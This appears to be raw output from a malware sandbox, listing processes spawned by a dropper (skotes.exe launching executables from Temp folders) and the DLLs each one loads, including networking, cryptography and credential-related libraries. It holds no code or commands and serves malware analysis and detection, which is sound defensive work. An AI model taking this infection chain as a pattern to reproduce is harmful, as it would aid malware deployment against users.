Source: C:\Users\user\DocumentsECBGHCGCBK.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe "C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe "C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe "C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe"
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Section loaded: apphelp.dll
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Section loaded: winmm.dll
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Section loaded: wininet.dll
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Section loaded: sspicli.dll
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Section loaded: uxtheme.dll
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Section loaded: mstask.dll
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Section loaded: windows.storage.dll
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Section loaded: wldp.dll
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Section loaded: mpr.dll
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Section loaded: dui70.dll
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Section loaded: duser.dll
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Section loaded: chartv.dll
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Section loaded: oleacc.dll
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Section loaded: atlthunk.dll
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Section loaded: textinputframework.dll
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Section loaded: coremessaging.dll
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Section loaded: ntmarta.dll
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Section loaded: wintypes.dll
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Section loaded: wintypes.dll
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Section loaded: wintypes.dll
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Section loaded: winsta.dll
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Section loaded: textshaping.dll
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Section loaded: propsys.dll
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Section loaded: iertutil.dll
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Section loaded: explorerframe.dll
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Section loaded: profapi.dll
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Section loaded: edputil.dll
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Section loaded: urlmon.dll
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Section loaded: srvcli.dll
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Section loaded: netutils.dll
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Section loaded: appresolver.dll
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Section loaded: slc.dll
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Section loaded: userenv.dll
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Section loaded: sppc.dll
Source: C:\Users\user\DocumentsECBGHCGCBK.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1005523001\3daf81f16e.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005525001\be33d1b9ea.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005522001\28d9ab8742.exe Section loaded: ondemandconnroutehelper.dll
